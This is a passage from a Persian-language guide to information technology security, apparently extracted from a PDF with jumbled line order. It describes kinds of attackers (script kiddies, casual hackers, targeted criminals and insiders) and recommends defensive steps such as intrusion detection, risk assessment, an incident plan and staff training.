ﻣﺠﺎﺯ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﻬﺎ ﻧﻴﺴﺘﻨﺪ ﺩﺳﺖ ﭘﻴﺪﺍ ﻛﻨﻨﺪ .ﺑﺎ ﺍﻳـﻦ ﻭﺟـﻮﺩ
ﻼ ﺑﺎ ﺍﺑﺰﺍﺭﻫﺎﻱ ﻧﻔﻮﺫ ﺁﺷﻨﺎ ﻧﺒﺎﺷﻨﺪ ﻭ ﺑﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳـﺖ
ﺷﺎﻳﺪ ﻛﺎﻣ ﹰ
ﺍﺯ ﺍﺑﺰﺍﺭﻫﺎ ﺑﺎﻋﺚ ﺗﺨﺮﻳﺐ ﺳﻴﺴﺘﻤﻬﺎ ﺷﻮﻧﺪ .ﻋـﻼﻭﻩ ﺑـﺮ ﺍﻳـﻦ ﺍﮔـﺮ
ﺍﺑﺰﺍﺭﻫﺎ ﺍﺯ ﺍﻳﻨﺘﺮﻧﺖ downloadﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺭﺍﻱ
ﺩﺭﺏ ﻣﺨﻔــﻲ ٥٩ﻳــﺎ ﺗــﺮﺍﻭﺍ ٦٠ﺑﺎﺷــﻨﺪ ﻛــﻪ ﻣــﻮﺭﺩ ﺍﺳــﺘﻔﺎﺩﻩ ﺩﻳﮕــﺮ
ﻣﻬﺎﺟﻤﻴﻦ ﻗﺮﺍﺭ ﻣﻲﮔﻴﺮﻧﺪ .ﻟﺬﺍ ﻧﻔﻮﺫ ﺗﻔﻨﻨـﻲ ﻳـﻚ ﺗﻬﺪﻳـﺪ ﺑـﺰﺭﮒ
Social Engineering
Casual Hackers
Summertime Hackers
Backdoor
Trojan
56
57
58
59
60
١٣٩
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﺩ ﻭ ﻣﻬﻤﺘﺮﻳﻦ ﺩﻟﻴﻞ ﻣﻤﻨﻮﻉ ﺑﻮﺩﻥ ﺁﻥ ﻧﻴﺰ ﻫﻤﻴﻦ
ﺍﺳﺖ.
ﺩﺍﺭﺩ .ﺍﻳﻦ ﺍﻓﺮﺍﺩ ﺑﻪ ﻋﻠﺖ ﺳﻄﺢ ﺩﺳﺘﺮﺳﻲﺷﺎﻥ ﺩﺭ ﺩﺍﺧﻞ ﺳﺎﺯﻣﺎﻥ،
ﺍﺯ ﻟﺤﺎﻅ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﻧﮕﺮﺍﻧﻲ ﺟﺪﻱ ﻣﺤﺴﻮﺏ ﻣﻲﺷﻮﻧﺪ.
ﻻ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺟـﻮﺍﻧﺘﺮ )ﺩﺭ ﺳـﻦ
""Script Kiddieﻫـﺎ ﻣﻌﻤـﻮ ﹰ
ﺩﺭ ﺩﺳﺘﺔ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ،ﺑﺮﺧﻲ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻋﻠﺖ ﺧـﺴﺘﮕﻲ
ﺍﺯ ﻛﺎﺭ ﻳﺎ ﺟﺬﺍﺑﻴﺘﻬﺎﻱ ﺭﻗﺎﺑﺖ ﻓﻨﻲ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻧﻔـﻮﺫ ﻣـﻲﻛﻨﻨـﺪ.
ﮔﺮﻭﻫﻲ ﺩﻳﮕﺮ ﺑﺪﻧﺒﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ ﺗﺮﻓﻴـﻊ ﻭ ﺩﺳـﺘﻤﺰﺩ
ﻫﻤﻜﺎﺭﺍﻥ ﻳﺎ ﺩﺍﺩﻩﻫﺎﻱ ﺳﺎﺯﻣﺎﻧﻲ ﻫـﺴﺘﻨﺪ .ﺑﻌـﻀﻲ ﺩﻳﮕـﺮ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﺍﻗﺪﺍﻣﺎﺕ ﺗﻼﻓﻲ ﺟﻮﻳﺎﻧﻪ ﻋﻠﻴﻪ ﺳﺎﺯﻣﺎﻥ ﺑـﻪ ﺍﻳـﻦ
ﻋﻤﻞ ﺩﺳﺖ ﺑﺰﻧﻨﺪ؛ ﻳﺎ ﺑﺎﻋﺚ ﺗﻬﺪﻳـﺪﺍﺕ ﻧﺎﺧﻮﺍﺳـﺘﻪﺍﻱ ﺷـﻮﻧﺪ ﻛـﻪ
ﻋﻠﺖ ﺁﻥ ﻋﺪﻡ ﺣﻔﺎﻇﺖ ﺻﺤﻴﺢ ﺍﺯ ﺳﻴﺴﺘﻢ ﺑﻪ ﻋﻠﺖ ﺁﻣﻮﺯﺵ ﻓﻨﻲ
ﻧﺎﻗﺺ ﻳﺎ ﺑﻲﺩﻗﺘﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺎﺷﺪ.
ﻻ ﻣﻬﺎﺟﻤﺎﻥ ﺧﺒـﺮﻩﺍﻱ ﻫـﺴﺘﻨﺪ ﻛـﻪ
ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ ﻣﻌﻤﻮ ﹰ
ﻫﺪﻑ ﺁﻧﻬﺎ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ،ﺗﺨﺮﻳﺐ ﻭ ﺍﺯ ﺑﻴﻦ ﺑﺮﺩﻥ ﺩﺍﺩﻩﻫـﺎ ،ﻭ
ﺍﺯ ﻛﺎﺭ ﺍﻧﺪﺍﺧﺘﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺧﻼﻝ ﻳﻚ ﺑﺎﺯﺓ ﺯﻣـﺎﻧﻲ ﻣـﻲﺑﺎﺷـﺪ.
ﺑﺮﺧﻼﻑ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨﻲ ﻭ ""script kiddieﻫﺎ ،ﻫـﺪﻑ ﺁﻧﻬـﺎ
ﻭﺍﻗﻌﹰﺎ ﻧﻔﻮﺫ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﺍﺳـﺖ .ﺁﻧﻬـﺎ ﺩﺭ ﺑﺮﺧـﻲ ﻣـﻮﺍﺭﺩ ﺑـﺪﻧﺒﺎﻝ
ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﻣﺜـﻞ ﺩﺍﺩﻩﻫـﺎﻱ ﻣـﺎﻟﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ ﻛـﺎﺭﺕ
ﺍﻋﺘﺒﺎﺭﻱ ﻭ ﺟﺰﺋﻴﺎﺕ ﺣﺴﺎﺏ ﺑﺎﻧﻜﻲ( ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﺷﺨﺼﻲ )ﺷـﻤﺎﺭﻩﻫـﺎﻱ
ﺷﻨﺎﺳﺎﻳﻲ ،ﺳﻮﺍﺑﻖ ﺩﺍﻧﺸﮕﺎﻫﻲ ﻭ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺸﺘﺮﻳﺎﻥ( ﻫـﺴﺘﻨﺪ ﺗـﺎ ﺁﻧﻬـﺎ ﺭﺍ
ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ ﻳﺎ ﺑﮕﻮﻧﻪﺍﻱ ﺩﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﺑﺒﺮﻧﺪ .ﺍﻳـﻦ ﺩﺳـﺘﻪ ﺍﺯ
ﻣﻬﺎﺟﻤﺎﻥ ﻏﺎﻟﺒﹰﺎ ﺑﺨﻮﺑﻲ ﺳﺎﺯﻣﺎﻧﺪﻫﻲ ﻣﻲﺷﻮﻧﺪ ﻭ ﭘـﻴﺶ ﺍﺯ ﺍﻧﺠـﺎﻡ
ﺣﻤﻠﺔ ﺍﺻﻠﻲ ،ﺍﻃﻼﻋﺎﺕ ﺍﺭﺯﺷﻤﻨﺪﻱ ﺭﺍﺟـﻊ ﺑـﻪ ﺳـﺎﺯﻣﺎﻥ ﻗﺮﺑـﺎﻧﻲ
ﺟﻤﻊﺁﻭﺭﻱ ﻣﻲﻛﻨﻨﺪ .ﺧﻮﺷﺒﺨﺘﺎﻧﻪ ﺗﻌﺪﺍﺩ ﺍﻳﻦ ﻧﻮﻉ ﻣﺠﺮﻣﺎﻥ ﻛﻤﺘـﺮ
ﺍﺯ ﺍﻧﻮﺍﻉ ﺩﻳﮕﺮ ﺍﺳﺖ ،ﺍﻣﺎ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔﻮﺫ ﺁﻧـﺎﻥ ﺑـﺴﻴﺎﺭ ﻣـﺸﻜﻞ
ﻣﻲﺑﺎﺷﺪ ﻭ ﺩﺭﺻﻮﺭﺕ ﻧﻔﻮﺫ ﻣﻮﻓﻘﻴﺖﺁﻣﻴـﺰ ،ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑﺎﻋـﺚ
ﺗﺨﺮﻳﺒﻬﺎﻱ ﺟﺪﻱ ﺷﻮﻧﺪ.
ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭ ﻣﺸﺎﻭﺭﺍﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻄﻮﺭ ﻋﻤﺪﻱ ﻭ ﻳـﺎ ﺳـﻬﻮﻱ
ﺗﻬﺪﻳﺪﺍﺕ ﺟﺪﻱ ﺑﺮﺍﻱ ﺳﻴﺴﺘﻢ ﺍﻳﺠﺎﺩ ﻛﻨﻨـﺪ ﻭ ﺍﻳـﻦ ﺑـﺴﺘﮕﻲ ﺑـﻪ
ﻣﺎﻫﻴﺖ ﺭﻭﺍﺑﻂ ﺁﻧﻬﺎ ﺑﺎ ﻣـﺪﻳﺮﺍﻥ ﻭ ﻫﻤﻜﺎﺭﺍﻧـﺸﺎﻥ ﺩﺭ ﻣﺤـﻴﻂ ﻛـﺎﺭ
)Intrusion Detection Systems (IDSs
61
ﻫﺮﻳــﻚ ﺍﺯ ﺍﻳــﻦ ﺗﻬﺪﻳــﺪﺍﺕ ﺑــﺎﻟﻘﻮﺓ ﺍﻧــﺴﺎﻧﻲ ﺑــﺮﺍﻱ ﺳﻴــﺴﺘﻤﻬﺎ ﻭ
ﺍﻃﻼﻋﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺳﻄﺢ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺯ ﻣﺨﺎﻃﺮﻩ ﺭﺍ ﺑﻪ ﻫﻤﺮﺍﻩ ﺩﺍﺭﻧﺪ ﻭ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻭﻗﻮﻉ ﺁﻧﻬﺎ ﺑﻪ ﺭﻭﺷﻬﺎﻱ ﻣﺘﻔﺎﻭﺗﻲ ﻧﻴـﺎﺯ ﺍﺳـﺖ.
ﺶ ﺑﻪﺭﻭﺯ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳﺎﺏ ﻣﻤﻜﻦ ﺍﺳـﺖ
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗ ﹺ
ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔـﻮﺫﮔﺮﺍﻥ ﺗﻔﻨﻨـﻲ ﻳـﺎ ""script kiddieﻫـﺎ
ﻛﻔﺎﻳﺖ ﻛﻨﻨﺪ .ﺍﻣـﺎ ﺩﺭ ﻣـﻮﺭﺩ ﺗﺒﻬﻜـﺎﺭﺍﻥ ﻫﺪﻓـﺪﺍﺭ ،ﺍﻳـﻦ ﺭﺍﻫﺒـﺮﺍﻥ
ﻫﻮﺷﻴﺎﺭ ﺳﻴﺴﺘﻢ ﻭ ﻣﺪﻳﺮﺍﻥ ﻫﺴﺘﻨﺪ ﻛﻪ ﺑﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ
ﻣﺘﻮﻗﻒ ﺳﺎﺯﻧﺪ؛ ﻭ ﺩﺭ ﺍﻳﻦ ﺭﺍﺳﺘﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺳﻴﺎﺳﺘﻬﺎﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻭ
ﺗﻮﺟﻪ ﻣﺪﻳﺮﻳﺖ ﺑﻪ ﺧﻨﺜﻲﺳﺎﺯﻱ ﺣﻤﻼﺕ ﺍﺣﺘﻤﺎﻟﻲ ﺩﺭﻭﻥﺳـﺎﺯﻣﺎﻧﻲ
ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ .ﺍﻣﺎ ﻫﻴﭻ ﻃﺮﺣﻲ ﺑﺪﻭﻥ ﻧﻘﺺ ﻧﻴـﺴﺖ ﻭ ﺑـﺴﻴﺎﺭ
ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﺳﺎﺑﻘﻪ ﻭ ﺭﻭﻧﺪ ﺍﻳﻦ ﻃﺮﺣﻬﺎ ﺭﺍ ﺑﺎ ﺗﻮﺟـﻪ
ﺑﻪ ﻧﻔﻮﺫﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺴﺘﻤﺮﹰﺍ ﺑﺮﺭﺳﻲ ﻛﻨـﺪ .ﻧﻈـﺎﺭﺕ ﻣـﺴﺘﻤﺮ ﺑـﺮ
ﺩﻭﺭﻧﻤــﺎﻱ ﺍﻣﻨﻴﺘــﻲ ،ﻛــﺸﻒ ﻭ ﺟﻠــﻮﮔﻴﺮﻱ ﺍﺯ ﻧﻔــﻮﺫ ﺭﺍ ﺳــﺎﺩﻩﺗــﺮ
ﻣﻲﻧﻤﺎﻳﺪ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ،ﺍﺗﺨﺎﺫ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺷﻔﺎﻑ ﺩﺭﺑـﺎﺭﺓ ﺁﻧﭽـﻪ
ﻛﻪ ﺑﺎﻳﺪ ﺣﻴﻦ ﻭ ﺑﻌﺪ ﺍﺯ ﻭﻗﻮﻉ ﺣﻤﻠﻪ ﺍﻧﺠﺎﻡ ﺷﻮﺩ ﺑﻪ ﻛﺎﻫﺶ ﺁﺳﻴﺐ
ﻛﻤﻚ ﻣﻲﻛﻨﺪ ،ﺍﻓـﺮﺍﺩ ﻣـﺴﺌﻮﻝ ﺭﺍ ﺑـﺮﺍﻱ ﺭﺳـﻴﺪﮔﻲ ﺑـﻪ ﺧﺮﺍﺑـﻲ
ﺭﺍﻫﻨﻤﺎﻳﻲ ﻣﻲﻧﻤﺎﻳﺪ ﻭ ﺍﻣﻜﺎﻥ ﺛﺒﺖ ﻣﻨﺎﺳﺐ ﮔﺰﺍﺭﺷﺎﺕ ﻻﺯﻡ ﺑـﺮﺍﻱ
ﻣﻘﺎﻣﺎﺕ ﺩﺍﺧﻞ ﻭ ﺧﺎﺭﺝ ﺳﺎﺯﻣﺎﻥ ﺭﺍ ﻓﺮﺍﻫﻢ ﻣﻲﺳﺎﺯﺩ.
ﺗﺨﻤﻴﻦ ﻋﻤﻠﻲ ﺍﻣﻨﻴﺖ:
ﺑﺮﺁﻭﺭﺩ ﻣﺨﺎﻃﺮﻩ ﻭ ﺗﺤﻠﻴﻞ ﺯﻳﺎﻥ
ﻫﻤﺎﻧﮕﻮﻧﻪ ﻛﻪ ﻣﺸﺎﻫﺪﻩ ﻛﺮﺩﻳﻢ ﺗﺨﻠﻔﺎﺕ ﺍﻣﻨﻴﺘﻲ ﺭﻳﺸﻪ ﺩﺭ ﺣﻤﻼﺕ
ﺩﺍﺧﻠﻲ ﻭ ﺧﺎﺭﺟﻲ ﺩﺍﺭﻧﺪ ﻭ ﺑﻪ ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴـﺴﺘﻤﻬﺎ ﻭ
ﺩﺍﺩﻩﻫﺎ ﺑﺮﺍﻱ ﺍﻫﺪﺍﻑ ﻏﻴﺮﻗﺎﻧﻮﻧﻲ ﻭ ﻏﻴﺮﺍﺧﻼﻗﻲ ﻣﻨﺘﻬﻲ ﻣﻲﺷـﻮﻧﺪ.
ﮔﺎﻣﻬﺎﻱ ﺍﺑﺘﺪﺍﻳﻲ ﺍﻳﺠﺎﺩ ﺳﻴﺎﺳﺖ ﺍﻣﻨﻴﺘﻲ ﺯﻣﺎﻧﻲ ﺑﺮﺩﺍﺷﺘﻪ ﻣﻲﺷـﻮﺩ
ﻛﻪ ﺳﺎﺯﻣﺎﻥ ،ﻳﻚ ﺗﺨﻤﻴﻦ ﺍﻣﻨﻴﺘﻲ ﺩﺭ ﻣﻮﺭﺩ ﻓﺮﺁﻳﻨـﺪﻫﺎﻱ ﺩﺍﺧﻠـﻲ،
ﺍﻫﺪﺍﻑ ،ﻭ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﻣﻮﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ .ﻫﻨﮕﺎﻣﻴﻜﻪ ﺍﻳـﻦ
ﺑﺨﺶ ﺳﻮﻡ
ﺩﺑﻴﺮﺳﺘﺎﻥ ﻳﺎ ﭘﻴﺶﺩﺍﻧﺸﮕﺎﻫﻲ( ﻫﺴﺘﻨﺪ ﻛﻪ ﻣﻬﺎﺭﺗﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺧـﻮﺏ
ﻭ ﺍﻭﻗﺎﺕ ﺑﻴﻜﺎﺭﻱ ﺯﻳﺎﺩﻱ ﺩﺍﺭﻧﺪ ،ﺍﻣﺎ ﭼﻨﺪﺍﻥ ﺧﺒﺮﻩ ﻧﻴﺴﺘﻨﺪ ﻭ ﺑـﺮﺍﻱ
ﺍﻧﺠﺎﻡ ﻧﻔﻮﺫ ﺍﺯ ﺗﻜﻪﺑﺮﻧﺎﻣﻪﻫﺎﻳﻲ ﻛﻪ ﺩﻳﮕﺮﺍﻥ ﺗﻬﻴﻪ ﻛﺮﺩﻩﺍﻧﺪ ﺍﺳﺘﻔﺎﺩﻩ
ﻣﻲﻛﻨﻨﺪ .ﺑﻄﻮﺭ ﻛﻠﻲ ﺍﻓﺮﺍﺩ ﺍﻳﻦ ﺩﺳﺘﻪ ﻣﺎﻧﻨﺪ ﺗﺒﻬﻜﺎﺭﺍﻥ ﻫﺪﻓﺪﺍﺭ )ﻛﻪ
ﺩﺭ ﺍﺩﺍﻣﺔ ﻫﻤـﻴﻦ ﻣﻄﻠـﺐ ﺑﺮﺭﺳـﻲ ﺷـﺪﻩ( ،ﺑـﺮ ﺭﻭﻱ ﺗﺨﺮﻳـﺐ ﻣﺘﻤﺮﻛـﺰ
ﻧﻤﻲﺷﻮﻧﺪ ﺍﻣﺎ ﺗﻌﺪﺍﺩ ﺁﻧﻬﺎ ﺯﻳﺎﺩ ﺍﺳﺖ ﻭ ﮔﺎﻫﻲ ﺑﻪ ﺻﻮﺭﺕ ﺗﻴﻤﻲ ﻛﺎﺭ
ﻣﻲﻛﻨﻨﺪ ﻭ ﻃﺒﻴﻌﺘﹰﺎ ﺩﺭ ﺍﻳﻦ ﻗﺎﻟـﺐ ﺗﻬﺪﻳـﺪ ﺑﺰﺭﮔﺘـﺮﻱ ﺑـﻪ ﺣـﺴﺎﺏ
ﻣﻲﺁﻳﻨﺪ"Script Kiddie" .ﻫﺎ ﻧﻔﻮﺫ ﻣﻮﻓﻖ ﺧـﻮﺩ ﺭﺍ ﻣﻨﺘـﺸﺮ ﻭ ﺍﺯ
ﻲ
ﺁﻥ ﻃﺮﻳﻖ ﺍﺩﻋﺎﻱ ﺷﻬﺮﺕ ﻣﻲﻛﻨﻨـﺪ .ﺩﺭ ﻭﺍﻗـﻊ ﺁﻧﻬـﺎ ﺑـﻪ ﺑـﺪﻧﺎﻣ ﹺ
ﺣﺎﺻﻞ ﺍﺯ ﺣﺠﻢ ﺯﻳﺎﺩ ﺣﻤﻼﺕ ﺧﻮﺩ ﺍﻓﺘﺨﺎﺭ ﻣـﻲﻛﻨﻨـﺪ .ﺑـﻪ ﻋﻠـﺖ
ﺭﻭﺍﺝ ﺍﻳﻦ ﺗﻬﺪﻳﺪ ،ﺳـﺎﺯﻧﺪﮔﺎﻥ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺍﻣﻨﻴﺘـﻲ ﺍﺑﺰﺍﺭﻫـﺎﻱ
ﻣﺆﺛﺮﻱ ﺭﺍ ﺑﺮﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺍﻳـﻦ ﻧـﻮﻉ ﻧﻔـﻮﺫ ﺗﻬﻴـﻪ ﻛـﺮﺩﻩﺍﻧـﺪ.
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﻭ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻣﻬﺎﺟﻢﻳـﺎﺏ ٦١ﺑـﺮﺍﻱ ﺩﻓـﺎﻉ ﺩﺭ
ﻣﻘﺎﺑﻞ ﭼﻨﻴﻦ ﺣﻤﻼﺗﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ.
١٤٠
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﻋﻨﺎﺻﺮ ﺗﺠﺰﻳﻪ ﻭ ﺗﺤﻠﻴـﻞ ﺷـﺪﻧﺪ ،ﻳـﻚ ﺳﻴﺎﺳـﺖ ﺍﻣﻨﻴﺘـﻲ ﻭ ﻧﻴـﺰ
ﻃﺮﺣﻲ ﺑﺮﺍﻱ ﺭﻭﺍﻟﻬﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻮﺳﻌﻪ ﻳﺎﺑﺪ.
ﺍﻳﻦ ﻃﺮﺡ ﺑﺎﻳﺪ ﺣﺎﻭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﺩﺭﺑﺎﺭﺓ ﺣﻮﺯﻩﻫﺎﻱ ﻛﻠﻴﺪﻱ ﺫﻳـﻞ
ﺑﺎﺷﺪ:
o
o
o
o
o
•
ﺩﺍﻧﺴﺘﻦ ﺯﻣﺎﻧﻲ ﻛﻪ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻭﺍﻗﻊ ﻣﻲﺷﻮﻳﺪ -ﺍﺯ ﻃﺮﻳﻖ
ﺑﻜــﺎﺭﮔﻴﺮﻱ ﺳﻴــﺴﺘﻤﻬﺎﻱ ﻛــﺸﻒ ﺗﻬــﺎﺟﻢ ﻭ ﻫﻮﺷــﻴﺎﺭﻱ
ﺩﺍﺧﻠﻲ.
•
ﻓﺮﺍﻫﻢ ﺳﺎﺧﺘﻦ ﺳﻨﺎﺭﻳﻮﻱ ﺑﺪﺗﺮﻳﻦ ﺣﺎﻟﺖ ﻣﻤﻜـﻦ -ﺗﻔﻜـﺮ
ﺩﺭﺑﺎﺭﺓ ﺗﺄﺛﻴﺮﺍﺕ ﻣﻀﺎﻋﻔﻲ ﻛـﻪ ﻧﻘـﺾ ﺍﻣﻨﻴـﺖ ﻣـﻲﺗﻮﺍﻧـﺪ
ﺑﺮﺍﻳﺘﺎﻥ ﺑﺪﻧﺒﺎﻝ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ.
•
ﺗﺪﻭﻳﻦ ﻳﻚ ﺳﻴﺎﺳﺖ ﻣﻜﺘﻮﺏ ﺑﺮﺍﻱ ﺛﺒـﺖ ﻭﻗـﺎﻳﻊ ﺍﻣﻨﻴﺘـﻲ
)ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﻧﻔﻮﺫ - (٦٢ﺍﻳﻦ ﺳﻨﺪ ﻛﺘﺒﻲ ﺑﻪ ﺗﺤﻠﻴﻞ ﻭﻗﺎﻳﻊ
ﻣﻨﻔﺮﺩ ﻭ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺣﻤـﻼﺕ ﻣﻮﻓـﻖ ﺩﺭ ﺁﻳﻨـﺪﻩ ﻛﻤـﻚ
ﻣﻲﻛﻨﺪ.
•
ﺍﺳﺘﺨﺪﺍﻡ ﻳﻚ ﻣﺘﺨﺼﺺ ﺩﺭﺻـﻮﺭﺕ ﻧﻴـﺎﺯ -ﺑـﺮ ﻣﺒﻨـﺎﻱ
ﺭﺧﺪﺍﺩﻫﺎ ﻳﺎ ﺑـﺮ ﻣﺒﻨـﺎﻱ ﻣﻮﺍﻓﻘﺘﻨﺎﻣـﺔ ﻣـﺸﺎﻭﺭﺓ ﺩﻭﺭﻩﺍﻱ .ﺍﺯ
ﺍﺳﺘﺨﺪﺍﻡ ﻧﻔﻮﺫﮔﺮﺍﻥ ﺧﻮﺩﺧﻮﺍﻧﺪﻩ )ﻛﺴﺎﻧﻴﻜﻪ ﻣـﺪﻋﻲ ﻧﻔـﻮﺫﮔﺮﻱ
ﻫﺴﺘﻨﺪ( ﺍﺟﺘﻨﺎﺏ ﻛﻨﻴﺪ .ﻣﺒﺤـﺚ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺍﺯ ﻃﺮﻳـﻖ
٦٣
ﻣﻨﺎﺑﻊ ﺧﺎﺭﺟﻲ ﺩﺭ ﺍﺩﺍﻣﻪ ﺍﻳﻦ ﺑﺨﺶ ﻣﻄﺮﺡ ﻣﻲﺷﻮﺩ.
•
ﻓﺮﺍﻫﻢ ﻧﻤﻮﺩﻥ ﺁﻣﻮﺯﺵ ﻻﺯﻡ ﺑﺮﺍﻱ ﻛﺎﺭﻛﻨﺎﻥ ﻓﻨﻲ ﻭ ﺳـﺎﻳﺮ
ﻛﺎﺭﻣﻨﺪﺍﻥ -ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻧﻘﺼﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻧﺎﺷﻲ ﺍﺯ ﻛﻤﺒﻮﺩ
ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣـﻮﺭﺩ ﺭﻭﺍﻟﻬـﺎﻱ ﻣﻘﺎﺑﻠـﻪ ﺑـﺎ ﻣـﺴﺎﺋﻞ
ﺍﻣﻨﻴﺘﻲ ﻫﺴﺘﻨﺪ .ﻫﺮﻳﻚ ﺍﺯ ﻛﺎﺭﻛﻨﺎﻥ ﺩﺭ ﺷﺮﻛﺖ ﺑﺎﻳﺪ ﻧﺤﻮﺓ
ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺭﻭﺍﻟﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﺑﺪﺍﻧﺪ.
•
ﺗﻌﻴﻴﻦ ﻳـﻚ ﻧﻘﻄـﺔ ﺗﻤـﺎﺱ -ﺍﻳـﻦ ﻓـﺮﺩ ﺑﺎﻳـﺪ ﺩﺭ ﺣـﻮﺯﺓ
ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻣﺘﺨﺼﺺ ﺑﺎﺷﺪ ﻭ ﻭﻗﺎﻳﻊ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑـﻪ
ﺍﻋﻀﺎﻱ ﺗﻴﻢ ﻣﺪﻳﺮﻳﺖ ﮔﺰﺍﺭﺵ ﺩﻫﺪ.
•
ﺩﺭﻙ ﻭ ﺍﻭﻟﻮﻳﺖﺑﻨﺪﻱ ﺍﻫﺪﺍﻑ -ﻛﻪ ﺷﺎﻣﻞ ﻫﻤﻪ ﻳﺎ ﺑﺮﺧـﻲ
ﺍﺯ ﻣﻮﺍﺭﺩ ﺫﻳﻞ ﻣﻲﺷﻮﺩ:
Break-In Plan
۶۳
ﺍﻳﻦ ﺗﻮﺻﻴﻪ ﺑﻴﺸﺘﺮ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻣﺘﻮﺳـﻂ ﻭ ﺑـﺰﺭﮒ ﻋﻤﻠـﻲ ﺍﺳـﺖ ﻭ
ﻫﻤﭽﻨﻴﻦ ﺑﺮﺍﻱ ﺷﺮﻛﺘﻬﺎﻳﻲ ﻛﻪ ﺑﺮﺍﻱ ﺍﻧﺠـﺎﻡ ﻓﻌﺎﻟﻴﺘﻬﺎﻳـﺸﺎﻥ ﻭﺍﺑـﺴﺘﮕﻲ
ﺯﻳﺎﺩﻱ ﺑﻪ ﻓﻨﺎﻭﺭﻱ ﺩﺍﺭﻧﺪ ﻭ ﺑﺎﺯﺍﺭ ﻫﺪﻓﺸﺎﻥ ﺑﺎﺯﺍﺭ ﻓﻨﻲ ﭘﻴﺸﺮﻓﺘﻪ ﺍﺳـﺖ .ﺩﺭ
ﻣﻮﺭﺩ ﺩﻭﻡ ﻣﺸﺘﺮﻳﺎﻥ ﺑﺎﻟﻘﻮﻩ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮ ﺍﺳﺎﺱ ﻭﺟﻬﺔ ﻓﻨﻲ ﺷﺮﻛﺖ ﻭ
